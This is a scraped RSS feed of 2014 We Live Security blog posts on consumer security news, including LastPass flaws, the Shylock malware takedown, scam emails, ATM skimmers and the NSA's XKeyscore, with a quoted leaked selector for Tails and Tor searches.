A Tweet from Samsung’s official Exynos account (the high-end processor expected to appear in the upcoming Galaxy Note 4 phablet) said, “Security can be improved using features unique to us. That’s what we envision. What would you use?” The Tweet was accompanied by an image of an eye on the screen of a large smartphone/tablet.

Trusted Reviews notes that the Tweet also includes the words “Unlock the Future” and comments “if [this] isn’t an allusion to retina device unlocking we’ll eat our hats.”

Samsung Galaxy Note 4 – due in weeks?

Samsung executives have said that retina scans would be used in upcoming, high-end smartphones. International Business Times notes that the Samsung Galaxy Note 4 – a high-end, large-screen gadget aimed at workers on the move – is expected to launch at an event at Berlin’s IFA conference in early September.

Samsung used the conference to launch the predecessors to its Galaxy Note 4 handset, alongside paired devices such as the Galaxy Gear smartwatch.

Samsung executives have previously said in interview that the company is investigating new biometric technologies for use in high-end smartphones – including retina scans, which offer a higher level of security than current fingerprint scanners. Fingerprint scanners (used in current smartphones such as the Galaxy S5) have a high level of false positives, and are also possible to fool with fake fingerprints.

Galaxy Note 4 – security pioneer?

“We’re looking at various types of biometrics and one of things that everybody is looking at is iris detection,” Rhee said. He said that the technology would appear in high-end smartphones first – just as fingerprint scans appeared in Apple’s iPhone 5S and Samsung’s Galaxy S5. Samsung is currently riding the current wave of enthusiasm for biometrics.

“We, as a market leader, are following the market trend,” he said.

The Register points out that iris scanners offer a higher level of security than fingerprint scans – both the Galaxy S5 and iPhone 5S were ‘hacked’ within days of launch. “The trouble is, they’re not terribly secure – at least, not by the standards of government work. Hackers demonstrated a way to fool the Galaxy S5′s fingerprint scanner using a fake fingerprint made of wood glue four days after the phone launched,” the site commented.

Iris scans are used in high-security government institutions as they generally work faster than fingerprint scans, and offer higher accuracy by scanning for more data points.

At CES this year, a sensor designed for use in smartphones, Myris, boasted that it could best the levels of security offered by fingerprint scans, analyzing frames of video for unique identifiers at a speed comparable to “looking in a mirror”. The device required a mouse-sized dongle to operate – but offered, its makers claimed a “false positive” rate of 2.25 trillion, equivalent to the population of 315 Earths.

Anthony Antolino of Myris said, “Iris, as a human part of the body, is second only to DNA in terms of its ability to authenticate someone with certainty. No two people on the planet have the same iris texture. Not even identical twins.”

The post Retina scanner for Samsung Galaxy Note 4? appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/14/samsung-galaxy-note-4/feed/ 0
LastPass security holes found by researcher, says password management firm – but no need to panic http://www.welivesecurity.com/2014/07/12/lastpass-security-holes-found-researcher-says-password-management-firm-need-panic/ http://www.welivesecurity.com/2014/07/12/lastpass-security-holes-found-researcher-says-password-management-firm-need-panic/#comments Sat, 12 Jul 2014 16:43:22 +0000 LastPass security holes found by researcher, says password management firm – but no need to panic http://www.welivesecurity.com/?p=47757 LastPass has gone public about a couple of security holes that were found in its popular online password management software.

That's enough to send a shiver down the spines of the many internet users who trust the service to store its passwords securely, but the company says that there is no need to panic.

The post LastPass security holes found by researcher, says password management firm – but no need to panic appeared first on We Live Security.

]]>
LastPass has gone public about a couple of security holes that were found in its popular online password management software.

That’s enough to send a shiver down the spines of the many internet users who trust the service to store its passwords securely, but the company says that there is no need to panic.

In a blog post entitled “A note from LastPass”, the company has given brief details of the flaws found in its password manager for Chrome, Firefox, Opera and Safari.

(By the way, do you feel as cynical as me about how some vendors reporting security vulnerabilities in their products love to downplay the seriousness by not referring to any words like “security” or “vulnerability” in the headlines of their advisories?)

Bookmarklet vulnerability

The first vulnerability isn’t really in the main LastPass product at all, but instead in an add-on known as Bookmarklets.

LastPass Bookmarklets are small snippets of JavaScript code that install as a bookmark of “favourite” in your browser.

Chances are that you would only be using Bookmarklets if you wish to integrate LastPass more tightly with the mobile Safari browser on iOS, or if you weren’t using one of the major browsers that LastPass officially supports.

If you click on a Bookmarklet, you can execute code on the webpage that you’re viewing. That could, of course, be useful if there is a login form on the webpage and no other easy way to access your password manager, but what happens if the webpage you are running the code on is itself malicious?

Zhiwei Li, a security researcher at UC Berkeley, found a method by which (if a user clicked a bookmarklet while visiting an untrustworthy website) passwords for other sites could be extracted from LastPass and put in the hands of criminal hackers.

A research paper by Zhiwei depicts an untrustworthy site tricking a Bookmarklet into revealing the user’s Dropbox password – although this could actually be repeated to extract every password stored in a victim’s LastPass vault.

Bookmarklet vulnerability

LastPass says that Bookmarklets are “actively used by less than 1% of the user base”, and is keen to underline that the threat is small, and that it has seen no evidence of malicious exploitation:

“If you are concerned that you’ve used bookmarklets before September 2013 on non-trustworthy sites, you may consider changing your master password and generating new passwords, though we don’t think it is necessary.”

One Time Password (OTP) vulnerability

In this targeted attack, Zhiwei showed that it might be possible to exploit LastPass’s One Time Password (OTP) feature – normally used when a user is logging into their LastPass vault on a computer that they do not trust (such as one that is shared with other users), and that might be harbouring keylogging spyware.

OTPs self-destruct after one use, so even if a malicious hacker grabs the one you use to access your passwords – it shouldn’t be any use to them.

However, Zhiwei demonstrated that if an attacker knew their victim’s LastPass username they could exploit the feature to extract a directory of all the sites for which the user was storing passwords in LastPass. Fortunately, it wouldn’t give hackers access to a users’ actual passwords, but it would allow them to make off with an encrypted copy of the password database and allow them to delete credentials stored in the database.

“Regarding the OTP attack, it is a “targeted attack”, requiring an attacker to know the user’s username to potentially exploit it, and serve that custom attack per user, activity which we have not seen. Even if this was exploited, the attacker would still not have the key to decrypt user data. If you’d like to check your current OTPs you can do so here

LastPassThe good news is that the people who found the security vulnerabilities were Zhiwei and his fellow researchers at UC Berkeley, rather than a cybercriminal. Zhiwei is said to have acted responsibly with the information, and – according to LastPass’s statement – the company “doesn’t have any evidence they were exploited by anyone beyond [Zhiwei] and his research team.”

What strikes me as a little unusual about the disclosure of these vulnerabilities is that they were first reported (and indeed patched) back in the fall of last year. It has taken almost a year for them to become public.

LastPass says that Zhiwei only tested the exploits on dummy LastPass accounts, and because it found no evidence of malicious exploitation, and addressed the issues immediately, the company refrained from discussing the research until after it had been published.

All LastPass users should be grateful that the company addressed the security vulnerabilities so quickly, and feel reassured that there is no evidence that anyone’s password vaults were compromised.

Although flaws and issues are found from time to time with password managers, as detailed in Zhiwei’s research which looks at other password management products besides LastPass, I remain a strong believer that for the typical computer user decent password management software is going to be a more secure way of living a life online than relying on their brain and common sense to generate and keep secure their passwords.

Get yourself a password manager, choose a strong, hard-to-crack master password, enable two factor authentication and start taking your online privacy more seriously.

What do you think? Do you trust password management software? Or do you prefer to manage your passwords in a different way? Let us know your opinion by leaving a comment below.

The post LastPass security holes found by researcher, says password management firm – but no need to panic appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/12/lastpass-security-holes-found-researcher-says-password-management-firm-need-panic/feed/ 4
Banking malware Shylock’s servers knocked out by law enforcement http://www.welivesecurity.com/2014/07/11/shylock-banking-malware/ http://www.welivesecurity.com/2014/07/11/shylock-banking-malware/#comments Fri, 11 Jul 2014 15:31:07 +0000 Banking malware Shylock’s servers knocked out by law enforcement http://www.welivesecurity.com/?p=47672 A notorious strain of banking malware, known as Caphaw - or Shylock, due to snippets of Shakespeare’s Merchant of Venice embedded in its code - has seen its command and control servers shut down in a major international police operation.

The post Banking malware Shylock’s servers knocked out by law enforcement appeared first on We Live Security.

]]>
A notorious strain of banking malware, known as Caphaw – or Shylock, due to snippets of Shakespeare’s Merchant of Venice embedded in its code – has seen its command and control servers shut down in a major international police operation involving law enforcement from eight countries.

The British National Crime Agency (NCA) claims that the malware infected 10,000 PCs in Britain alone, and 30,000 worldwide, with victims in America among other countries.

ESET has tracked the banking malware since 2011, and ESET researchers have followed it closely since February 2013. In a detailed blog post, ESET researchers write, “Win32/Caphaw is an interesting financial malware family: one of the few that has autoload functionality for automatically stealing money when the user is actively accessing his banking account. An infected user can’t recognize that his money is being stolen, because he sees fake data on the banking web page based on the webinjects’ rules. (Autoloads bypass one-time password security checks.)”

Banking malware hits 30,000 users

ESET’s Virus Radar shows territories most affected by the banking malware. Britain’s NCA said in a statement that while the gang behind it is not thought to be British, the banking malware appeared to target British banks in particular, hence the NCA coordinated an international effort from the European Cybercrime Centre at Europol in the Hague.

“Victims are typically infected by clicking on malicious links, and then being convinced to download and run the malware. Shylock will then seek to access funds held in business or personal accounts, and transfer them to the criminal controllers,” the NCA said.

“The NCA is co-ordinating an international response to a cybercrime threat to businesses and individuals around the world,”  Andy Archibald, deputy director at the NCA’s National Cyber Crime Unit said in an interview with The Guardian.

“This phase of activity is intended to have a significant effect on the Shylock infrastructure and demonstrates how we are using partnerships across sectors and across national boundaries to cut cybercrime impacting the UK.”

Shylock banking malware – what to do

The NCA advises users worried about the banking malware to ensure their security software is up to date.

It says in a statement, “The latest operating system update will result in the removal of Shylock infections in machines which have been set to automatically update Windows.

Computer users opting for automated operating system updates – which can ensure computers infected with malware such as Shylock are cleaned automatically – need take no action at this time. Those not opting for automatic updates, or who would like to learn more about how to check their Windows-operated computers and remove infection, can go to: http://support.microsoft.com/gp/cu_sc_virsec_master.”

ESET offers tips on how to spot and avoid banking malware and scams alongside the latest updated banking malware news from ESET researchers.

The post Banking malware Shylock’s servers knocked out by law enforcement appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/11/shylock-banking-malware/feed/ 0
Google Drive privacy warning – could yours have leaked data? http://www.welivesecurity.com/2014/07/11/google-drive-privacy-warning/ http://www.welivesecurity.com/2014/07/11/google-drive-privacy-warning/#comments Fri, 11 Jul 2014 14:37:05 +0000 Google Drive privacy warning – could yours have leaked data? http://www.welivesecurity.com/?p=47662 Files sent as a link from Google Drive could have shared more than their senders intended, Google admitted this week - in a Google Drive privacy post where the internet giant admitted files could be visible to people other than their intended recipients.

The post Google Drive privacy warning – could yours have leaked data? appeared first on We Live Security.

]]>
Shared files sent via Google Drive could have shared more than their senders intended, Google admitted this week – in a Google Drive privacy post where the internet giant admitted that certain file types could be visible to people other than their intended recipients.

Google recently updated Drive with tools to make it more appealing for business, but the storage system is already commonly used in business to share and edit files. Google has issued detailed instructions for Google Drive users who fear they may have shared confidential information.

Google has patched the Google Drive privacy problem, and issued detailed instructions on what file types are affected (files created in other programs and stored unconverted in Google Drive, and shared with ‘anyone who has the link’).

Infoworld says, “Google’s handling of the matter is further evidence that the company has a good nose for how to deal with such exploits. But here’s also hoping Google applies the lessons from this discovery to all its services.”

Google Drive privacy – who can read my files?

Veteran security researcher and We Live Security contributor Graham Cluley, writing on the Intralinks blog, says that the leak, “underlines the unexpected dangers which can arise from allowing “anyone who has the link” to access your private data without further authentication.”

Google’s Drive privacy post explains which files may be at risk – yours are only at risk if they fulfill ALL of the following conditions;

  1. The file has to have been uploaded to Google Drive, and shared with ‘anyone who has the link’
  2. It has to have remained in its original format (ie .docx), without being converted to Google Drive formats such as Docs
  3. It has to have contained links to third-party HTTPS websites

If this is the case, admins on the third-party website may have been able to see a URL which allowed them to click through to sensitive data.

Cluley points out that in certain business scenarios – such as corporate takeover bids – this could plausibly have resulted in the target of such a bid being able to read the details freely online.

What do do if you’re worried about Google Drive privacy

Google has patched the issue – so that any documents shared via the service going forward will no longer be affected by the privacy problem.

This, however, does not affect documents that have already been shared via the service. Google Technical Program Manager Kevin Stadmeyer advises, “If one of your previously shared documents meets all four of the criteria above, you can generate a new sharing link with the following steps:

  1. Create a copy of the document, via File > “Make a copy…”
  2. Share the copy of the document with particular people or via a new shareable link, via the “Share” button
  3. Delete the original document.

In its guide to using Google Drive privately, the company advises users to make sure that documents are shared correctly – i.e. users should think carefully about whether ‘anyone who has the link’ is an appropriate setting for a confidential file…

The post Google Drive privacy warning – could yours have leaked data? appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/11/google-drive-privacy-warning/feed/ 0
Copyright emails ‘poisoned with Trojan’ http://www.welivesecurity.com/2014/07/10/copyright-email-poisoned-with-trojan/ http://www.welivesecurity.com/2014/07/10/copyright-email-poisoned-with-trojan/#comments Thu, 10 Jul 2014 16:41:00 +0000 Copyright emails ‘poisoned with Trojan’ http://www.welivesecurity.com/?p=47587 Emails warning internet users that they have violated copyright and owe companies such as Sony and Paramount a cash settlement have been circulating widely in Germany - but the shock tactic is a scam.

The post Copyright emails ‘poisoned with Trojan’ appeared first on We Live Security.

]]>
Emails warning internet users that they have violated copyright and owe companies such as Sony and Paramount a cash settlement have been circulating widely in Germany – but these copyright emails are a scam, bait to make victims click on a Trojan attached to the emails.

Duped by copyright email

The copyright emails accuse their recipients of having pirated tracks by artists such as Jay-Z, Bullet for my Valentine, James Blunt and heavy metal bands such as Sepultura.

Torrentfreak reports that up to 30,000 web users in Germany have received the copyright emails – and that “middle man” companies such as Rightscorp do send such demands via email, so victims are more likely to be duped into opening the poisoned attachment.

‘Fastest possible payment’

One of the copyright email messages says, “This is a warning because of your violation of § 19a of the Copyright Act on 07.06.2014. The music album ‘Bullet For My Valentine – Temper Temper’ was downloaded from your IP address 8.149.94.13 at 3:40:24.Only the fastest possible payment of a fine of 400.88 euros can prevent this. We expect payment within the next 48 hours.”

“For details see the attached document”

Thousands targeted

Cologne copyright lawyer Christian Solmecke said that he saw hundreds of emails in one morning this week – saying that the pattern of the attack was similar to a fake copyright violation phishing campaign which targeted users of the pornographic site RedTube.

“On Monday morning more than 100 people have called us in the office,” Solmecke writes on his blog. “We think that the fake warnings have reached 10,000 people today.”

The Next Web reports that some of the emails appear to arrive from genuine law firms involved in sending out copyright notices.

Solmecke offers guidelines to how to spot the fraudulent emails (German-language link): he says that the zip file is a giveaway, as no reputable law firm would send a copyright demand in the format, as is the 48-hour time limit users are faced with before paying the fine. .

The post Copyright emails ‘poisoned with Trojan’ appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/10/copyright-email-poisoned-with-trojan/feed/ 0
Nigerian scams expand to Malaysia – fraud doubles http://www.welivesecurity.com/2014/07/10/nigerian-scams-expand-to-malaysia/ http://www.welivesecurity.com/2014/07/10/nigerian-scams-expand-to-malaysia/#comments Thu, 10 Jul 2014 14:41:05 +0000 Nigerian scams expand to Malaysia – fraud doubles http://www.welivesecurity.com/?p=47577 Nigeria’s notorious fraud industry has expanded overseas - with Nigerian conmen entering Malaysia on student visas to perpetrate fraud using the country’s fast connections and advanced banking system, and raking in millions of dollars.

The post Nigerian scams expand to Malaysia – fraud doubles appeared first on We Live Security.

]]>
Nigeria’s notorious scam industry has expanded overseas – with Nigerian conmen entering Malaysia on student visas to perpetrate fraud using the country’s fast connections and advanced banking system, and raking in millions of dollars.

Nigerian scams target U.S. women

Reuters reports that American women are being ensnared via dating websites, with scammers targeting older, lonely women and swindling them out of life savings. Some victims have lost up to $250,000.

Officials at the U.S. consulate say that complaints about such scams now make up 80% of inquiries to duty officers in Kuala Lumpur, according to Time’s report.

NDTV reports that Malaysian police issued statements in December 2013, claiming that internet fraud had doubled in 2013, with losses over $11 million. Local police claimed to have apprehended 478 Africans on suspicion of involvement in such scams.

One case earlier this year saw five African men in an alleged internet scam arrested in Malaysia’s Klang Valley, along with local accomplices who provided them with bank accounts.

Local news outlet The Star reported that police seized 14 bank account books, 21 ATM cards, 10 handphones and several other items.
“Our initial investigations revealed that all five of the Nigerian suspects were in Malaysia on student visas,” a police official told a press conference.

Lack of resources?

U.S. officials, speaking to Reuters, claim that Malaysian police lack the resources to deal with the broader problem, and that no case involving a U.S. victim has yet been successfully prosecuted.

“These are not rich widows who are being preyed on, these are middle-class Americans who don’t have this kind of money to spare, “Tim Scherer, U.S. consul general said, “It can really transform their lives in a very terrible way.”

The post Nigerian scams expand to Malaysia – fraud doubles appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/10/nigerian-scams-expand-to-malaysia/feed/ 0
How to remove your house from Google Street View http://www.welivesecurity.com/2014/07/10/remove-house-google-street-view/ http://www.welivesecurity.com/2014/07/10/remove-house-google-street-view/#comments Thu, 10 Jul 2014 14:10:27 +0000 How to remove your house from Google Street View http://www.welivesecurity.com/?p=47601 How are YOU supposed to remove your house from Google Street View if you don't like the idea that Google drove one of its Street Cars up your road, took a photo of your front door without your permission, and then published it on the net?

Fortunately, there is a way...

The post How to remove your house from Google Street View appeared first on We Live Security.

]]>
Former British Prime Minister Tony Blair, septuagenarian former mop-top Sir Paul McCartney and disgraced former RBS banker Fred Goodwin are just some of the public figures who are said to have successfully convinced Google to change Street View pictures of their homes into a bunch of blurred pixels.

But what are you supposed to do if you’re not a political statesman, a crinkly crooner or an executive who oversaw the largest annual loss (£24.1 billion) in UK corporate history?

How are YOU supposed to remove your house from Google Street View if you don’t like the idea that Google drove one of its Street Cars up your road, took a photo of your front door without your permission, and then published it on the net?

Well, fortunately there is a way. And it should work not only if you are trying to remove your hose from Google Street View, but also if you want the search giant to blur out a face, a vehicle or another object.

1. Firstly, locate your address on maps.google.com. You do this simply by typing in the address into the search box, and pressing enter.

There should be a red pin-tack shown on the screen representing your home on the map.

You now need to make sure you are in Street View mode. You can do that by finding the Street View icon (represented by a stick man) in the lower right hand corner of the screen, and clicking on the map.

Google Street View icon

2. Use the left and right arrow controls with your mouse to adjust the Google Maps Street View, until you get a clear view of your house.

Once you’re happy the view represents your house, click on the “Report a Problem” link in the bottom right-hand corner of the screen.

Report a problem

You’re almost done. A new webpage is displayed, showing a street view of what Google believes you wish to raise a concern about. This is your final opportunity to adjust the view.

Report Google Street View

3. At this point you can tell Google what you wish to be blurred – a face, your home, a car or license plate, or a different object – and explain the area of concern.

Google will ask you for a contact email address and requests that you complete a CAPTCHA to verify that you are a human rather than a bot developed by privacy campaigners trying to sabotage Google Street View.

Click the Submit button.

Thanks Google, for considering blurring a picture of my house

4. You have done it. Now you just have to wait and see.

Tony Blair, or presumably one of his staff, went through the process and has successfully excised the image of his Georgian home in London.

Tony Blair's house in London

Will you be as successful as Tony Blair at getting a photo of the front of your house obscured from Google Street View? You can only hope that Google will honour your right to privacy.

At the time of writing my own front door is still visible on Street View, a week after I first requested its pixellation.

Of course, there are other solutions if you don’t like Google Street View showing the world a picture of your house.

For instance, Google CEO Eric Schmidt glibly told those who were concerned to “just move” if they didn’t like Google having a street view picture of their home.

Hardly a practical solution, I’m sure you would agree. Schmidt later claimed that he “misspoke” by making that remark – but I wondered if he had taken the advice himself.

After all, according to Forbes, Google CEO Eric Schmidt recently purchased a $22 million mansion in the Holmby Hills neighbourhood of Los Angeles, within spitting distance of Hugh Hefner’s Playboy mansion.

Eric Schmidt's home

As you can see – he doesn’t appear to have blurred out Google Street view images of his home. Mind you, it’s not as if you can actually see his home from the road.

Schmidt, you will remember, was the guy who back in October 2010 made the hairs stand up on the back of privacy-conscious internet users’ necks when he declared:

“Google policy is to get right up to the creepy line and not cross it”

Oh well, that’s reassuring…

The post How to remove your house from Google Street View appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/10/remove-house-google-street-view/feed/ 7
New ‘slimline’ ATM skimmers are near-invisible http://www.welivesecurity.com/2014/07/10/new-slimline-atm-skimmers-near-invisible/ http://www.welivesecurity.com/2014/07/10/new-slimline-atm-skimmers-near-invisible/#comments Thu, 10 Jul 2014 12:39:58 +0000 New ‘slimline’ ATM skimmers are near-invisible http://www.welivesecurity.com/?p=47563 New ‘slimline’ ATM skimmers are proving far harder to spot - with some of the hi-tech models remaining in place for up to five days before banks are alerted, and equipped with hi-tech extras such as cameras to spy on users' PIN codes.

The post New ‘slimline’ ATM skimmers are near-invisible appeared first on We Live Security.

]]>
New ‘slimline’ ATM skimmers are proving far harder to spot – with some of the hi-tech models remaining in place for up to five days before banks are alerted, according to a report released by a European ATM security group.

The report is based on crime updates from 19 countries in Europe – and highlights a technological arms race which has seen card fraud migrate to areas such as the U.S.

In four European countries, criminal gangs are using malicious software to overwhelm ATMs – and one European country has seen machines uprooted and their internal workings removed and rebuilt by criminals before being replaced. These machines are known as “ghost terminals.”

Ghost terminals

Red Orbit reports that some hi-tech models of ATM skimmer even come with a tiny concealed camera which monitors button-presses on the PIN keypad, so the device can steal card data and PIN numbers at once.

Veteran security reporter Brian Krebs dissected some of the latest ATM skimmers on his blog, Krebs on Security – noting that as well as cameras and housings made of stealthy translucent plastic, the devices often came with mobile phone parts attached to transmit the data from the ATM instantly.

“New versions of insert ATM skimmers (ATM skimmers placed inside the card reader throat) are getting harder to detect,” the European ATM Security Team revealed in its second European Fraud Update for 2014.

ATM Skimmers equipped with cameras and transmitters

Four countries reported the use of malware to compromise payment terminals – but overall, the EAST group reported that fraud monitoring and detection continued to be effective in Europe.

The group said, “European fraud counter-measures such as Geo-blocking, fraud monitoring capabilities and fraud detection continue to improve and most ATM related card skimming losses occur outside Europe and are migrating away from EMV Chip liability shift areas.”

Losses are now concentrating in other territories outside Europe – with the USA the top location for such attacks, followed by Thailand and Indonesia.

ESET Senior Research Fellow David Harley offers a detailed commentary on some of the technological issues underlying card fraud, particularly in America in a We Live Security blog post this month.

The post New ‘slimline’ ATM skimmers are near-invisible appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/10/new-slimline-atm-skimmers-near-invisible/feed/ 0
‘Malaysia Airlines flight MH370 found’ Facebook hoax http://www.welivesecurity.com/2014/07/09/flight-mh370-found-hoax/ http://www.welivesecurity.com/2014/07/09/flight-mh370-found-hoax/#comments Wed, 09 Jul 2014 11:13:45 +0000 ‘Malaysia Airlines flight MH370 found’ Facebook hoax http://www.welivesecurity.com/?p=47539 A link showing the nose of an airliner jutting above the waves, with the headline, ‘Malaysian Air Flight MH370 found by sailor’ has been circulating on Facebook this week, according to a report by Hoax-Slayer - but the link is a new scam.

The post ‘Malaysia Airlines flight MH370 found’ Facebook hoax appeared first on We Live Security.

]]>
A link showing the nose of an airliner jutting above the waves, with the headline, ‘Malaysian Air Flight MH370 found by sailor’ has been circulating on Facebook this week, according to a report by Hoax-Slayer – but the link is another scam designed to lure victims to complete surveys.

The new ‘video’ has surfaced just as Malaysia announced it was stepping up its search for the missing airliner in the Indian Ocean, as reported by the South China Morning Post. Cybercriminals often time scams to coincide with the global news cyclewe’ve created We Live Security guide to spotting these scams.

In this latest piece of ‘breaking news’, there is no video, and the entire news story is a fake: a new spin on a scam which blighted Facebook when the airliner first went missing four months ago.

‘MH370 found’

The message reads, “Malaysian Air Flight MH370 Found By Sailor Moments Ago: Mystery Solved – Sailor Awarded $5 Million on spot,” with a video underneath, showing the nose of a plane.

As with previous Facebook scams regarding the missing flight, the criminals have simply substituted an image of another plane crash – in this case, US Airways Flight 1549, which crashed in January 2009, plunging into New York’s Hudson River (without loss of life).

The link is equally false: in an echo of previous scams, users are urged to complete survey after survey, which earns the link’s creators money via affiliate marketing schemes. Some of the surveys attached to this particular scam ask for a mobile phone number – anyone who provides this information is immediately signed up for costly SMS services.

Hoax-Slayer says: “The scammers who create these fake video posts earn money via dodgy affiliate marketing schemes each and every time that a user participates in a survey. And, by tricking people into sharing the scam posts, they can greatly increase the number of potential victims.”

Endless surveys – and no video

“Some of the ‘survey’ pages ask you to provide your mobile phone number, an act that actually subscribes you to a very expensive text messaging service. Others may ask you to provide personal information including your name, address and contact details.”
Hoax-Slayer warns against clicking on any suspicious link purporting to carry ‘breaking news’.

Read ESET experts’ tips on how to spot such posts.

The post ‘Malaysia Airlines flight MH370 found’ Facebook hoax appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/09/flight-mh370-found-hoax/feed/ 0
Could latest NSA revelations further impact online behavior, denting the economy? http://www.welivesecurity.com/2014/07/08/nsa-revelations-tor-linux-90-percent/ http://www.welivesecurity.com/2014/07/08/nsa-revelations-tor-linux-90-percent/#comments Tue, 08 Jul 2014 16:10:15 +0000 Could latest NSA revelations further impact online behavior, denting the economy? http://www.welivesecurity.com/?p=47306 Internet surveillance by America's National Security Agency (NSA) has been further exposed by two new developments: the analysis of leaked NSA surveillance reports and the XKeyscore targeting code. Will these stories increase the number of Internet users who say they are inclined to reduce their online engagement due to the activities of the NSA and GCHQ.

The post Could latest NSA revelations further impact online behavior, denting the economy? appeared first on We Live Security.

]]>
Widespread Internet surveillance by America’s National Security Agency (NSA) has been further exposed by two new developments: the analysis of leaked NSA surveillance reports published by the Washington Post and the analysis of XKeyscore targeting code published by German public television. Coverage of these stories is unlikely to reassure the growing number of Internet users who say they are inclined to reduce their online engagement due to the activities of the NSA.

Reducing and/or modifying Internet activity in the wake of the NSA revelations instigated by Edward Snowden is a phenomenon we have documented on several occasions on We Live Security. In the Harris poll that we commissioned and earlier studies, we found that as many as 46% of people who were aware of the Snowden/NSA revelations had changed their online behavior in response to mass online surveillance. About a quarter of “NSA aware” people had reduced their online shopping and banking, as well as their use of email. I discussed these issues in a couple of podcasts, here and here.

That poll was conducted in February, and a lot of consumer-facing companies were probably hoping that this “Snowden effect” of online disengagement would wane in the ensuing months. However, in my opinion, the latest revelations are going to reinforce or sustain this trend.

The 90% Factor

Headlines like “90% of People the NSA Spies on Are Not Real Target” are not going to reassure anyone who has doubts about their online privacy. As the communication breakdown chart in the Washington Post indicates, 89% of accounts for which data was collected and stored belonged to “bystanders or non-targets”. And a lot of this data was personal communication, such as instant messages, emails, stored documents, Internet relay chats (IRC), social network messages (like Facebook status updates), and even real-time voice and video (such as Skype).

I think the Post does a good job of pointing out that there was also valuable anti-terrorist information within the sample of data they analyzed (data leaked to them by Edward Snowden). In fact, a majority of people we surveyed earlier this year thought surveillance was effective: 57% of Americans familiar with the NSA revelations believe that the government mass surveillance at the scale revealed by former CIA contractor Edward Snowden helps prevent terrorism. However, 43% disagreed, and in that same survey over 80% said there should be new laws implemented to better regulate  government surveillance. In other words the majority opinion seems to be that some surveillance is acceptable but it really needs to be better controlled.

Even as the latest up-tick in violence in the Middle East has raised concerns about terrorist threats, which might cause more people to support surveillance, the fact that the U.S. government appears to have been taken by surprise by the emergence of ISIS may lead more people to question how the country spends it’s intelligence budget (which is somewhere in excess of $50 billion).

Are You Tor-curious?

While the general public may be dismayed at reading Washington Post findings, one specific online constituency is outright upset. I’m talking about people who use and/or promote the Tor network. Named for The Onion Router, Tor is free software that enables a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet (but don’t Google Tor or visit the website just yet). The fact that America’s NSA and the UK’s GCHQ have been trying to defeat Tor was documented last year in The Guardian:

“The National Security Agency has made repeated attempts to develop attacks against people using Tor, a popular tool designed to protect online anonymity, despite the fact the software is primarily funded and promoted by the US government itself.”

I know it sounds a bit crazy, but read on, because what is newly revealed — in the analysis of programming code used by the NSA in its XKeyscore program — might sound even wilder:

“Merely searching the web for the privacy-enhancing software tools outlined in the XKeyscore rules causes the NSA to mark and track the IP address of the person doing the search.”

That’s according to German public broadcaster Norddeutscher Rundfunk, which actually published excerpts of the code. In other words, NSA may well track your IP address if you visit the Tor website (you were warned). Bear in mind that the site gets around 130,000 unique visitors a month (per compete.com). Presumably, the NSA has plenty of storage space and processing capacity to track all of those addresses, which may include several of mine, since I have gone to that site numerous times. And here’s what is both weird and infuriating about this NSA activity: only a very, very small percentage of the people who visit torproject.org are legitimate espionage targets.

(If you’ve forgotten what role Xkeyscore plays in the NSA’s Internet surveillance operations, here’s what Edward Snowden said you can do with it: “You could read anyone’s email in the world, anybody you’ve got an email address for. Any website: You can watch traffic to and from it. Any computer that an individual sits at: You can watch it. Any laptop that you’re tracking: you can follow it as it moves from place to place throughout the world. It’s a one-stop-shop for access to the NSA’s information.” From a TV interview with Norddeutscher Rundfunk.)

The Linux Extremists

If you think that tracking people who merely express an interest in Tor is extreme, then maybe you’re one of those “Linux Extremists”. You might think headlines like “NSA targets Linux Journal as ‘extremist forum‘” are an exaggeration, but the reality is right there in the code of the NSA’s XKeyscore program, part of an attempt to spy on people who might be interested in, or trying to use — warning, think before you click — The Amnesic Incognito Live System. Just take a look:

// START_DEFINITION
/*
These variables define terms and websites relating to the TAILs (The Amnesic
Incognito Live System) software program, a comsec mechanism advocated by
extremists on extremist forums.
*/
$TAILS_terms=word('tails' or 'Amnesiac Incognito Live System') and word('linux'
or ' USB ' or ' CD ' or 'secure desktop' or ' IRC ' or 'truecrypt' or ' tor ');
$TAILS_websites=('tails.boum.org/') or ('linuxjournal.com/content/linux*');
// END_DEFINITION

That’s code defining one of the categories you can target with Xkeyscore. No wonder as many as 9 out of 10 people in the surveillance data sampled by the Washington Post were “bystanders.”

Code Breakers or Deal Breakers

Whether or not consumer reluctance to engage online will make a visible dent on the 2014 earnings of online retailers, banks, and other players — like advertising-based services such as Facebook, Twitter, Google, and Yahoo — is hard to predict. But there have been some notable business hits directly attributable to the NSA revelations. Last month we learned that Verizon is not getting its German government contract renewed, largely because of the NSA/GCHQ connection seems to be the assumption. I couldn’t find an estimate of the value of that lost business but last year we saw Boeing lose a $4.5 billion fighter jet deal to Sweden’s Saab because the buyer, Brazil, was upset about the NSA. Cloud business losses in the wake of the NSA revelations were predicted to be tens of billions of dollars last year, but as this article in Gigaom suggests, it’s complicated. However, this chart of the share price of American networking equipment maker Cisco, plotted against the NASDAQ for the first 12 months after the first Snowden revelations, suggests that the news has not been good for their business.

cisco-v-nasdaq-snowden12

Sanity, Transparency, and Proportionality

Just because the NSA has been — in the eyes of many — doing electronic surveillance the wrong way doesn’t mean they should stop doing it. Clearly it makes no sense to ban online surveillance. As our survey revealed, people see its value. But people also question it’s proportionality to the threat. Is this the best use of funds, given how much terrorist activity such surveillance seems to have missed? Would more targeted, better supervised surveillance work better? And what about good old-fashioned human intelligence? Are we neglecting that in the hope that big data analysis will give better results with less risk? Personally, I’m skeptical on that front. Given that there are real economic costs to the way the NSA has been running its operations, the arguments for improvement and reform would appear to be compelling.

The post Could latest NSA revelations further impact online behavior, denting the economy? appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/08/nsa-revelations-tor-linux-90-percent/feed/ 0
